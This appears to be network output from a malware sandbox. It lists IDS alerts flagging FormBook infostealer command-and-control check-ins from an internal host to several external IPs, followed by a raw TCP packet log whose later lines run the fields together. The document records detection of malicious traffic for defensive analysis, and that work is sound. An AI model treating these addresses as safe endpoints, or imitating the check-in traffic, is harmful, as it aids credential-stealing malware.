2024-11-20T08:33:31.752384+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 50016 | 66.29.137.10 | 80 | TCP
2024-11-20T08:33:34.314684+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.6 | 50017 | 66.29.137.10 | 80 | TCP
2024-11-20T08:33:39.962605+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 50018 | 203.161.46.205 | 80 | TCP
2024-11-20T08:33:42.566078+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 50019 | 203.161.46.205 | 80 | TCP
2024-11-20T08:33:45.062014+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 50020 | 203.161.46.205 | 80 | TCP
2024-11-20T08:33:47.638147+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.6 | 50021 | 203.161.46.205 | 80 | TCP
2024-11-20T08:33:54.735361+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 50022 | 43.155.76.124 | 80 | TCP
2024-11-20T08:33:57.273456+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 50023 | 43.155.76.124 | 80 | TCP
2024-11-20T08:33:59.818741+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 50025 | 43.155.76.124 | 80 | TCP
2024-11-20T08:34:02.362521+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.6 | 50026 | 43.155.76.124 | 80 | TCP
2024-11-20T08:34:08.318850+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 50027 | 103.224.182.242 | 80 | TCP
2024-11-20T08:34:10.867578+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 50028 | 103.224.182.242 | 80 | TCP
2024-11-20T08:34:13.497498+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 50029 | 103.224.182.242 | 80 | TCP
2024-11-20T08:34:16.117357+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.6 | 50030 | 103.224.182.242 | 80 | TCP
2024-11-20T08:34:21.628824+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 50031 | 13.248.169.48 | 80 | TCP
2024-11-20T08:34:24.170562+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 50032 | 13.248.169.48 | 80 | TCP
2024-11-20T08:34:26.724768+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 50033 | 13.248.169.48 | 80 | TCP
2024-11-20T08:34:29.348125+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.6 | 50034 | 13.248.169.48 | 80 | TCP
2024-11-20T08:34:34.903506+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 50035 | 13.248.169.48 | 80 | TCP
2024-11-20T08:34:37.436227+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 50036 | 13.248.169.48 | 80 | TCP
2024-11-20T08:34:39.991492+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 50037 | 13.248.169.48 | 80 | TCP
2024-11-20T08:34:42.532171+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.6 | 50038 | 13.248.169.48 | 80 | TCP
2024-11-20T08:34:48.132791+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 50039 | 172.67.162.39 | 80 | TCP
2024-11-20T08:34:50.723072+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 50040 | 172.67.162.39 | 80 | TCP
2024-11-20T08:34:53.275913+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 50041 | 172.67.162.39 | 80 | TCP
2024-11-20T08:34:55.824858+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.6 | 50043 | 172.67.162.39 | 80 | TCP
2024-11-20T08:35:01.374225+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 50044 | 13.248.169.48 | 80 | TCP
2024-11-20T08:35:03.940299+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 50045 | 13.248.169.48 | 80 | TCP
2024-11-20T08:35:06.479706+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 50046 | 13.248.169.48 | 80 | TCP
2024-11-20T08:35:09.015592+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.6 | 50047 | 13.248.169.48 | 80 | TCP
2024-11-20T08:35:14.777692+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 50048 | 104.21.4.93 | 80 | TCP
2024-11-20T08:35:17.312999+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 50049 | 104.21.4.93 | 80 | TCP
2024-11-20T08:35:19.858913+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 50050 | 104.21.4.93 | 80 | TCP
2024-11-20T08:35:22.429916+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.6 | 50051 | 104.21.4.93 | 80 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 20, 2024 08:31:49.069591045 CET | 49872 | 80 | 192.168.2.6 | 188.114.96.3
Nov 20, 2024 08:31:49.075570107 CET | 80 | 49872 | 188.114.96.3 | 192.168.2.6
Nov 20, 2024 08:31:49.075679064 CET | 49872 | 80 | 192.168.2.6 | 188.114.96.3
Nov 20, 2024 08:31:49.084477901 CET | 49872 | 80 | 192.168.2.6 | 188.114.96.3
Nov 20, 2024 08:31:49.090507030 CET | 80 | 49872 | 188.114.96.3 | 192.168.2.6
Nov 20, 2024 08:31:49.721586943 CET | 80 | 49872 | 188.114.96.3 | 192.168.2.6
Nov 20, 2024 08:31:49.721900940 CET | 80 | 49872 | 188.114.96.3 | 192.168.2.6
Nov 20, 2024 08:31:49.721951008 CET | 49872 | 80 | 192.168.2.6 | 188.114.96.3
Nov 20, 2024 08:31:49.726294994 CET | 49872 | 80 | 192.168.2.6 | 188.114.96.3
Nov 20, 2024 08:31:49.731173038 CET | 80 | 49872 | 188.114.96.3 | 192.168.2.6
Nov 20, 2024 08:32:04.888576031 CET | 49966 | 80 | 192.168.2.6 | 76.223.74.74
Nov 20, 2024 08:32:04.893407106 CET | 80 | 49966 | 76.223.74.74 | 192.168.2.6
Nov 20, 2024 08:32:04.893480062 CET | 49966 | 80 | 192.168.2.6 | 76.223.74.74
Nov 20, 2024 08:32:04.926918983 CET | 49966 | 80 | 192.168.2.6 | 76.223.74.74
Nov 20, 2024 08:32:04.931786060 CET | 80 | 49966 | 76.223.74.74 | 192.168.2.6
Nov 20, 2024 08:32:05.409843922 CET | 80 | 49966 | 76.223.74.74 | 192.168.2.6
Nov 20, 2024 08:32:05.409986973 CET | 80 | 49966 | 76.223.74.74 | 192.168.2.6
Nov 20, 2024 08:32:05.410048962 CET | 49966 | 80 | 192.168.2.6 | 76.223.74.74
Nov 20, 2024 08:32:06.436826944 CET | 49966 | 80 | 192.168.2.6 | 76.223.74.74
Nov 20, 2024 08:32:07.455744982 CET | 49986 | 80 | 192.168.2.6 | 76.223.74.74
Nov 20, 2024 08:32:07.460661888 CET | 80 | 49986 | 76.223.74.74 | 192.168.2.6
Nov 20, 2024 08:32:07.460738897 CET | 49986 | 80 | 192.168.2.6 | 76.223.74.74
Nov 20, 2024 08:32:07.473522902 CET | 49986 | 80 | 192.168.2.6 | 76.223.74.74
Nov 20, 2024 08:32:07.478590012 CET | 80 | 49986 | 76.223.74.74 | 192.168.2.6
Nov 20, 2024 08:32:07.970556974 CET | 80 | 49986 | 76.223.74.74 | 192.168.2.6
Nov 20, 2024 08:32:07.970664978 CET | 80 | 49986 | 76.223.74.74 | 192.168.2.6
Nov 20, 2024 08:32:07.970724106 CET | 49986 | 80 | 192.168.2.6 | 76.223.74.74
Nov 20, 2024 08:32:08.983541965 CET | 49986 | 80 | 192.168.2.6 | 76.223.74.74
Nov 20, 2024 08:32:10.002407074 CET | 49987 | 80 | 192.168.2.6 | 76.223.74.74
Nov 20, 2024 08:32:10.007886887 CET | 80 | 49987 | 76.223.74.74 | 192.168.2.6
Nov 20, 2024 08:32:10.007997036 CET | 49987 | 80 | 192.168.2.6 | 76.223.74.74
Nov 20, 2024 08:32:10.020680904 CET | 49987 | 80 | 192.168.2.6 | 76.223.74.74
Nov 20, 2024 08:32:10.025598049 CET | 80 | 49987 | 76.223.74.74 | 192.168.2.6
Nov 20, 2024 08:32:10.025657892 CET | 80 | 49987 | 76.223.74.74 | 192.168.2.6
Nov 20, 2024 08:32:10.547473907 CET | 80 | 49987 | 76.223.74.74 | 192.168.2.6
Nov 20, 2024 08:32:10.547517061 CET | 80 | 49987 | 76.223.74.74 | 192.168.2.6
Nov 20, 2024 08:32:10.547590017 CET | 49987 | 80 | 192.168.2.6 | 76.223.74.74
Nov 20, 2024 08:32:11.530396938 CET | 49987 | 80 | 192.168.2.6 | 76.223.74.74
Nov 20, 2024 08:32:12.553869963 CET | 49989 | 80 | 192.168.2.6 | 76.223.74.74
Nov 20, 2024 08:32:12.558830023 CET | 80 | 49989 | 76.223.74.74 | 192.168.2.6
Nov 20, 2024 08:32:12.558895111 CET | 49989 | 80 | 192.168.2.6 | 76.223.74.74
Nov 20, 2024 08:32:12.567233086 CET | 49989 | 80 | 192.168.2.6 | 76.223.74.74
Nov 20, 2024 08:32:12.572084904 CET | 80 | 49989 | 76.223.74.74 | 192.168.2.6
Nov 20, 2024 08:32:13.073115110 CET | 80 | 49989 | 76.223.74.74 | 192.168.2.6
Nov 20, 2024 08:32:13.073292017 CET | 80 | 49989 | 76.223.74.74 | 192.168.2.6
Nov 20, 2024 08:32:13.073358059 CET | 49989 | 80 | 192.168.2.6 | 76.223.74.74
Nov 20, 2024 08:32:13.075545073 CET | 49989 | 80 | 192.168.2.6 | 76.223.74.74
Nov 20, 2024 08:32:13.080660105 CET | 80 | 49989 | 76.223.74.74 | 192.168.2.6
Nov 20, 2024 08:32:18.551095963 CET | 49990 | 80 | 192.168.2.6 | 163.44.185.183
Nov 20, 2024 08:32:18.555916071 CET | 80 | 49990 | 163.44.185.183 | 192.168.2.6
Nov 20, 2024 08:32:18.556005955 CET | 49990 | 80 | 192.168.2.6 | 163.44.185.183
Nov 20, 2024 08:32:18.568269968 CET | 49990 | 80 | 192.168.2.6 | 163.44.185.183
Nov 20, 2024 08:32:18.573358059 CET | 80 | 49990 | 163.44.185.183 | 192.168.2.6
Nov 20, 2024 08:32:19.343815088 CET | 80 | 49990 | 163.44.185.183 | 192.168.2.6
Nov 20, 2024 08:32:19.343837976 CET | 80 | 49990 | 163.44.185.183 | 192.168.2.6
Nov 20, 2024 08:32:19.343848944 CET | 80 | 49990 | 163.44.185.183 | 192.168.2.6
Nov 20, 2024 08:32:19.343940973 CET | 80 | 49990 | 163.44.185.183 | 192.168.2.6
Nov 20, 2024 08:32:19.343952894 CET | 80 | 49990 | 163.44.185.183 | 192.168.2.6
Nov 20, 2024 08:32:19.344001055 CET | 49990 | 80 | 192.168.2.6 | 163.44.185.183
Nov 20, 2024 08:32:19.344048023 CET | 49990 | 80 | 192.168.2.6 | 163.44.185.183
Nov 20, 2024 08:32:19.344062090 CET | 80 | 49990 | 163.44.185.183 | 192.168.2.6
Nov 20, 2024 08:32:19.344116926 CET | 49990 | 80 | 192.168.2.6 | 163.44.185.183
Nov 20, 2024 08:32:19.344161987 CET | 80 | 49990 | 163.44.185.183 | 192.168.2.6
Nov 20, 2024 08:32:19.344175100 CET | 80 | 49990 | 163.44.185.183 | 192.168.2.6
Nov 20, 2024 08:32:19.344187021 CET | 80 | 49990 | 163.44.185.183 | 192.168.2.6
Nov 20, 2024 08:32:19.344199896 CET | 80 | 49990 | 163.44.185.183 | 192.168.2.6
Nov 20, 2024 08:32:19.344216108 CET | 49990 | 80 | 192.168.2.6 | 163.44.185.183
Nov 20, 2024 08:32:19.344257116 CET | 49990 | 80 | 192.168.2.6 | 163.44.185.183
Nov 20, 2024 08:32:19.348954916 CET | 80 | 49990 | 163.44.185.183 | 192.168.2.6
Nov 20, 2024 08:32:19.349023104 CET | 80 | 49990 | 163.44.185.183 | 192.168.2.6
Nov 20, 2024 08:32:19.349035025 CET | 80 | 49990 | 163.44.185.183 | 192.168.2.6
Nov 20, 2024 08:32:19.349081993 CET | 49990 | 80 | 192.168.2.6 | 163.44.185.183
Nov 20, 2024 08:32:19.389684916 CET | 49990 | 80 | 192.168.2.6 | 163.44.185.183
Nov 20, 2024 08:32:19.515652895 CET | 80 | 49990 | 163.44.185.183 | 192.168.2.6
Nov 20, 2024 08:32:19.515671968 CET | 80 | 49990 | 163.44.185.183 | 192.168.2.6
Nov 20, 2024 08:32:19.515682936 CET | 80 | 49990 | 163.44.185.183 | 192.168.2.6
Nov 20, 2024 08:32:19.515836000 CET | 49990 | 80 | 192.168.2.6 | 163.44.185.183
Nov 20, 2024 08:32:19.515853882 CET | 80 | 49990 | 163.44.185.183 | 192.168.2.6
Nov 20, 2024 08:32:19.515911102 CET | 49990 | 80 | 192.168.2.6 | 163.44.185.183
Nov 20, 2024 08:32:19.515912056 CET | 80 | 49990 | 163.44.185.183 | 192.168.2.6
Nov 20, 2024 08:32:19.516088009 CET | 80 | 49990 | 163.44.185.183 | 192.168.2.6
Nov 20, 2024 08:32:19.516144991 CET | 49990 | 80 | 192.168.2.6 | 163.44.185.183
Nov 20, 2024 08:32:20.077308893 CET | 49990 | 80 | 192.168.2.6 | 163.44.185.183
Nov 20, 2024 08:32:21.095530033 CET | 49991 | 80 | 192.168.2.6 | 163.44.185.183
Nov 20, 2024 08:32:21.100464106 CET | 80 | 49991 | 163.44.185.183 | 192.168.2.6
Nov 20, 2024 08:32:21.100558043 CET | 49991 | 80 | 192.168.2.6 | 163.44.185.183
Nov 20, 2024 08:32:21.122011900 CET | 49991 | 80 | 192.168.2.6 | 163.44.185.183
Nov 20, 2024 08:32:21.127702951 CET | 80 | 49991 | 163.44.185.183 | 192.168.2.6
Nov 20, 2024 08:32:21.919670105 CET | 80 | 49991 | 163.44.185.183 | 192.168.2.6
Nov 20, 2024 08:32:21.919878006 CET | 80 | 49991 | 163.44.185.183 | 192.168.2.6
Nov 20, 2024 08:32:21.919886112 CET | 80 | 49991 | 163.44.185.183 | 192.168.2.6
Nov 20, 2024 08:32:21.919893026 CET | 80 | 49991 | 163.44.185.183 | 192.168.2.6
Nov 20, 2024 08:32:21.919899940 CET | 80 | 49991 | 163.44.185.183 | 192.168.2.6
Nov 20, 2024 08:32:21.919914961 CET | 80 | 49991 | 163.44.185.183 | 192.168.2.6
Nov 20, 2024 08:32:21.919928074 CET | 80 | 49991 | 163.44.185.183 | 192.168.2.6
Nov 20, 2024 08:32:21.920061111 CET | 49991 | 80 | 192.168.2.6 | 163.44.185.183
Nov 20, 2024 08:32:21.920061111 CET | 49991 | 80 | 192.168.2.6 | 163.44.185.183
Nov 20, 2024 08:32:21.920092106 CET | 80 | 49991 | 163.44.185.183 | 192.168.2.6
Nov 20, 2024 08:32:21.920137882 CET | 49991 | 80 | 192.168.2.6 | 163.44.185.183
Nov 20, 2024 08:32:21.921544075 CET | 80 | 49991 | 163.44.185.183 | 192.168.2.6
Nov 20, 2024 08:32:21.921623945 CET | 80 | 49991 | 163.44.185.183 | 192.168.2.6
Nov 20, 2024 08:32:21.921669006 CET | 49991 | 80 | 192.168.2.6 | 163.44.185.183
Nov 20, 2024 08:32:21.924953938 CET | 80 | 49991 | 163.44.185.183 | 192.168.2.6
Nov 20, 2024 08:32:21.925009012 CET | 80 | 49991 | 163.44.185.183 | 192.168.2.6
Nov 20, 2024 08:32:21.925020933 CET | 80 | 49991 | 163.44.185.183 | 192.168.2.6
Nov 20, 2024 08:32:21.925055981 CET | 49991 | 80 | 192.168.2.6 | 163.44.185.183
                                                                                  Nov 20, 2024 08:32:21.925081968 CET8049991163.44.185.183192.168.2.6
                                                                                  Nov 20, 2024 08:32:21.925126076 CET4999180192.168.2.6163.44.185.183
                                                                                  Nov 20, 2024 08:32:22.089765072 CET8049991163.44.185.183192.168.2.6
                                                                                  Nov 20, 2024 08:32:22.089814901 CET8049991163.44.185.183192.168.2.6
                                                                                  Nov 20, 2024 08:32:22.089828014 CET8049991163.44.185.183192.168.2.6
                                                                                  Nov 20, 2024 08:32:22.089940071 CET8049991163.44.185.183192.168.2.6
                                                                                  Nov 20, 2024 08:32:22.090020895 CET4999180192.168.2.6163.44.185.183
                                                                                  Nov 20, 2024 08:32:22.090020895 CET4999180192.168.2.6163.44.185.183
                                                                                  Nov 20, 2024 08:32:22.090065002 CET8049991163.44.185.183192.168.2.6
                                                                                  Nov 20, 2024 08:32:22.090111971 CET4999180192.168.2.6163.44.185.183
                                                                                  Nov 20, 2024 08:32:22.624289989 CET4999180192.168.2.6163.44.185.183
                                                                                  Nov 20, 2024 08:32:23.642527103 CET4999280192.168.2.6163.44.185.183
                                                                                  Nov 20, 2024 08:32:23.647511959 CET8049992163.44.185.183192.168.2.6
                                                                                  Nov 20, 2024 08:32:23.647598028 CET4999280192.168.2.6163.44.185.183
                                                                                  Nov 20, 2024 08:32:23.665066004 CET4999280192.168.2.6163.44.185.183
                                                                                  Nov 20, 2024 08:32:23.669949055 CET8049992163.44.185.183192.168.2.6
                                                                                  Nov 20, 2024 08:32:23.670093060 CET8049992163.44.185.183192.168.2.6
                                                                                  Nov 20, 2024 08:32:24.442312956 CET8049992163.44.185.183192.168.2.6
                                                                                  Nov 20, 2024 08:32:24.442328930 CET8049992163.44.185.183192.168.2.6
                                                                                  Nov 20, 2024 08:32:24.442339897 CET8049992163.44.185.183192.168.2.6
                                                                                  Nov 20, 2024 08:32:24.442435026 CET8049992163.44.185.183192.168.2.6
                                                                                  Nov 20, 2024 08:32:24.442446947 CET8049992163.44.185.183192.168.2.6
                                                                                  Nov 20, 2024 08:32:24.442456961 CET8049992163.44.185.183192.168.2.6
                                                                                  Nov 20, 2024 08:32:24.442467928 CET8049992163.44.185.183192.168.2.6
                                                                                  Nov 20, 2024 08:32:24.442540884 CET4999280192.168.2.6163.44.185.183
                                                                                  Nov 20, 2024 08:32:24.442540884 CET4999280192.168.2.6163.44.185.183
                                                                                  Nov 20, 2024 08:32:24.442540884 CET4999280192.168.2.6163.44.185.183
                                                                                  Nov 20, 2024 08:32:24.442667961 CET8049992163.44.185.183192.168.2.6
                                                                                  Nov 20, 2024 08:32:24.442677975 CET8049992163.44.185.183192.168.2.6
                                                                                  Nov 20, 2024 08:32:24.442694902 CET8049992163.44.185.183192.168.2.6
                                                                                  Nov 20, 2024 08:32:24.442709923 CET4999280192.168.2.6163.44.185.183
                                                                                  Nov 20, 2024 08:32:24.442739964 CET4999280192.168.2.6163.44.185.183
                                                                                  Nov 20, 2024 08:32:24.447444916 CET8049992163.44.185.183192.168.2.6
                                                                                  Nov 20, 2024 08:32:24.447500944 CET8049992163.44.185.183192.168.2.6
                                                                                  Nov 20, 2024 08:32:24.447513103 CET8049992163.44.185.183192.168.2.6
                                                                                  Nov 20, 2024 08:32:24.447556973 CET4999280192.168.2.6163.44.185.183
                                                                                  Nov 20, 2024 08:32:24.612636089 CET8049992163.44.185.183192.168.2.6
                                                                                  Nov 20, 2024 08:32:24.612665892 CET8049992163.44.185.183192.168.2.6
                                                                                  Nov 20, 2024 08:32:24.612678051 CET8049992163.44.185.183192.168.2.6
                                                                                  Nov 20, 2024 08:32:24.612705946 CET4999280192.168.2.6163.44.185.183
                                                                                  Nov 20, 2024 08:32:24.612768888 CET8049992163.44.185.183192.168.2.6
                                                                                  Nov 20, 2024 08:32:24.612806082 CET4999280192.168.2.6163.44.185.183
                                                                                  Nov 20, 2024 08:32:24.612845898 CET8049992163.44.185.183192.168.2.6
                                                                                  Nov 20, 2024 08:32:24.612911940 CET8049992163.44.185.183192.168.2.6
                                                                                  Nov 20, 2024 08:32:24.612950087 CET4999280192.168.2.6163.44.185.183
                                                                                  Nov 20, 2024 08:32:24.613117933 CET8049992163.44.185.183192.168.2.6
                                                                                  Nov 20, 2024 08:32:24.613169909 CET4999280192.168.2.6163.44.185.183
                                                                                  Nov 20, 2024 08:32:25.172858000 CET4999280192.168.2.6163.44.185.183
                                                                                  Nov 20, 2024 08:32:26.190982103 CET4999480192.168.2.6163.44.185.183
                                                                                  Nov 20, 2024 08:32:26.196008921 CET8049994163.44.185.183192.168.2.6
                                                                                  Nov 20, 2024 08:32:26.196130037 CET4999480192.168.2.6163.44.185.183
                                                                                  Nov 20, 2024 08:32:26.207138062 CET4999480192.168.2.6163.44.185.183
                                                                                  Nov 20, 2024 08:32:26.211970091 CET8049994163.44.185.183192.168.2.6
                                                                                  Nov 20, 2024 08:32:26.991022110 CET8049994163.44.185.183192.168.2.6
                                                                                  Nov 20, 2024 08:32:26.991189003 CET8049994163.44.185.183192.168.2.6
                                                                                  Nov 20, 2024 08:32:26.991261005 CET8049994163.44.185.183192.168.2.6
                                                                                  Nov 20, 2024 08:32:26.991271019 CET8049994163.44.185.183192.168.2.6
                                                                                  Nov 20, 2024 08:32:26.991332054 CET8049994163.44.185.183192.168.2.6
                                                                                  Nov 20, 2024 08:32:26.991328955 CET4999480192.168.2.6163.44.185.183
                                                                                  Nov 20, 2024 08:32:26.991343021 CET8049994163.44.185.183192.168.2.6
                                                                                  Nov 20, 2024 08:32:26.991425991 CET8049994163.44.185.183192.168.2.6
                                                                                  Nov 20, 2024 08:32:26.991435051 CET8049994163.44.185.183192.168.2.6
                                                                                  Nov 20, 2024 08:32:26.991446018 CET8049994163.44.185.183192.168.2.6
                                                                                  Nov 20, 2024 08:32:26.991476059 CET4999480192.168.2.6163.44.185.183
                                                                                  Nov 20, 2024 08:32:26.991514921 CET8049994163.44.185.183192.168.2.6
                                                                                  Nov 20, 2024 08:32:26.991542101 CET4999480192.168.2.6163.44.185.183
                                                                                  Nov 20, 2024 08:32:26.991564035 CET4999480192.168.2.6163.44.185.183
                                                                                  Nov 20, 2024 08:32:26.996211052 CET8049994163.44.185.183192.168.2.6
                                                                                  Nov 20, 2024 08:32:26.996239901 CET8049994163.44.185.183192.168.2.6
                                                                                  Nov 20, 2024 08:32:26.996252060 CET8049994163.44.185.183192.168.2.6
                                                                                  Nov 20, 2024 08:32:26.996304989 CET4999480192.168.2.6163.44.185.183
                                                                                  Nov 20, 2024 08:32:26.996342897 CET8049994163.44.185.183192.168.2.6
                                                                                  Nov 20, 2024 08:32:26.996433020 CET4999480192.168.2.6163.44.185.183
                                                                                  Nov 20, 2024 08:32:27.078696012 CET8049994163.44.185.183192.168.2.6
                                                                                  Nov 20, 2024 08:32:27.078706026 CET8049994163.44.185.183192.168.2.6
                                                                                  Nov 20, 2024 08:32:27.078825951 CET4999480192.168.2.6163.44.185.183
                                                                                  Nov 20, 2024 08:32:27.168257952 CET8049994163.44.185.183192.168.2.6
                                                                                  Nov 20, 2024 08:32:27.168327093 CET8049994163.44.185.183192.168.2.6
                                                                                  Nov 20, 2024 08:32:27.168339014 CET8049994163.44.185.183192.168.2.6
                                                                                  Nov 20, 2024 08:32:27.168418884 CET8049994163.44.185.183192.168.2.6
                                                                                  Nov 20, 2024 08:32:27.168431044 CET8049994163.44.185.183192.168.2.6
                                                                                  Nov 20, 2024 08:32:27.168521881 CET4999480192.168.2.6163.44.185.183
                                                                                  Nov 20, 2024 08:32:27.168629885 CET8049994163.44.185.183192.168.2.6
                                                                                  Nov 20, 2024 08:32:27.168663025 CET4999480192.168.2.6163.44.185.183
                                                                                  Nov 20, 2024 08:32:27.168687105 CET4999480192.168.2.6163.44.185.183
                                                                                  Nov 20, 2024 08:32:27.169718027 CET8049994163.44.185.183192.168.2.6
                                                                                  Nov 20, 2024 08:32:27.171123028 CET4999480192.168.2.6163.44.185.183
                                                                                  Nov 20, 2024 08:32:27.174806118 CET4999480192.168.2.6163.44.185.183
                                                                                  Nov 20, 2024 08:32:27.179651022 CET8049994163.44.185.183192.168.2.6
                                                                                  Nov 20, 2024 08:32:32.206209898 CET4999580192.168.2.6172.67.162.12
                                                                                  Nov 20, 2024 08:32:32.211191893 CET8049995172.67.162.12192.168.2.6
                                                                                  Nov 20, 2024 08:32:32.211278915 CET4999580192.168.2.6172.67.162.12
                                                                                  Nov 20, 2024 08:32:32.227000952 CET4999580192.168.2.6172.67.162.12
                                                                                  Nov 20, 2024 08:32:32.231976986 CET8049995172.67.162.12192.168.2.6
                                                                                  Nov 20, 2024 08:32:32.755002022 CET8049995172.67.162.12192.168.2.6
                                                                                  Nov 20, 2024 08:32:32.755700111 CET8049995172.67.162.12192.168.2.6
                                                                                  Nov 20, 2024 08:32:32.755875111 CET4999580192.168.2.6172.67.162.12
                                                                                  Nov 20, 2024 08:32:33.733607054 CET4999580192.168.2.6172.67.162.12
                                                                                  Nov 20, 2024 08:32:34.753415108 CET4999680192.168.2.6172.67.162.12
                                                                                  Nov 20, 2024 08:32:34.758642912 CET8049996172.67.162.12192.168.2.6
                                                                                  Nov 20, 2024 08:32:34.758951902 CET4999680192.168.2.6172.67.162.12
                                                                                  Nov 20, 2024 08:32:34.779586077 CET4999680192.168.2.6172.67.162.12
                                                                                  Nov 20, 2024 08:32:34.784558058 CET8049996172.67.162.12192.168.2.6
                                                                                  Nov 20, 2024 08:32:35.293843031 CET8049996172.67.162.12192.168.2.6
                                                                                  Nov 20, 2024 08:32:35.294502020 CET8049996172.67.162.12192.168.2.6
                                                                                  Nov 20, 2024 08:32:35.294691086 CET4999680192.168.2.6172.67.162.12
                                                                                  Nov 20, 2024 08:32:36.296108007 CET4999680192.168.2.6172.67.162.12
                                                                                  Nov 20, 2024 08:32:37.314274073 CET4999780192.168.2.6172.67.162.12
                                                                                  Nov 20, 2024 08:32:37.319607973 CET8049997172.67.162.12192.168.2.6
                                                                                  Nov 20, 2024 08:32:37.319736004 CET4999780192.168.2.6172.67.162.12
                                                                                  Nov 20, 2024 08:32:37.335365057 CET4999780192.168.2.6172.67.162.12
                                                                                  Nov 20, 2024 08:32:37.340274096 CET8049997172.67.162.12192.168.2.6
                                                                                  Nov 20, 2024 08:32:37.340394020 CET8049997172.67.162.12192.168.2.6
                                                                                  Nov 20, 2024 08:32:37.887171984 CET8049997172.67.162.12192.168.2.6
                                                                                  Nov 20, 2024 08:32:37.887877941 CET8049997172.67.162.12192.168.2.6
                                                                                  Nov 20, 2024 08:32:37.887957096 CET4999780192.168.2.6172.67.162.12
                                                                                  Nov 20, 2024 08:32:38.843122005 CET4999780192.168.2.6172.67.162.12
                                                                                  Nov 20, 2024 08:32:39.861325026 CET4999880192.168.2.6172.67.162.12
                                                                                  Nov 20, 2024 08:32:39.869014025 CET8049998172.67.162.12192.168.2.6
                                                                                  Nov 20, 2024 08:32:39.869101048 CET4999880192.168.2.6172.67.162.12
                                                                                  Nov 20, 2024 08:32:39.880542994 CET4999880192.168.2.6172.67.162.12
                                                                                  Nov 20, 2024 08:32:39.885920048 CET8049998172.67.162.12192.168.2.6
                                                                                  Nov 20, 2024 08:32:40.445230007 CET8049998172.67.162.12192.168.2.6
                                                                                  Nov 20, 2024 08:32:40.445550919 CET8049998172.67.162.12192.168.2.6
                                                                                  Nov 20, 2024 08:32:40.445647001 CET4999880192.168.2.6172.67.162.12
                                                                                  Nov 20, 2024 08:32:40.447767973 CET4999880192.168.2.6172.67.162.12
                                                                                  Nov 20, 2024 08:32:40.452708006 CET8049998172.67.162.12192.168.2.6
                                                                                  Nov 20, 2024 08:32:45.567159891 CET4999980192.168.2.685.159.66.93
                                                                                  Nov 20, 2024 08:32:45.572144032 CET804999985.159.66.93192.168.2.6
                                                                                  Nov 20, 2024 08:32:45.572278976 CET4999980192.168.2.685.159.66.93
                                                                                  Nov 20, 2024 08:32:45.587671041 CET4999980192.168.2.685.159.66.93
                                                                                  Nov 20, 2024 08:32:45.592602968 CET804999985.159.66.93192.168.2.6
                                                                                  Nov 20, 2024 08:32:47.094329119 CET4999980192.168.2.685.159.66.93
                                                                                  Nov 20, 2024 08:32:47.099713087 CET804999985.159.66.93192.168.2.6
                                                                                  Nov 20, 2024 08:32:47.099885941 CET4999980192.168.2.685.159.66.93
                                                                                  Nov 20, 2024 08:32:48.114305973 CET5000080192.168.2.685.159.66.93
                                                                                  Nov 20, 2024 08:32:48.119497061 CET805000085.159.66.93192.168.2.6
                                                                                  Nov 20, 2024 08:32:48.119577885 CET5000080192.168.2.685.159.66.93
                                                                                  Nov 20, 2024 08:32:48.138432026 CET5000080192.168.2.685.159.66.93
                                                                                  Nov 20, 2024 08:32:48.143347979 CET805000085.159.66.93192.168.2.6
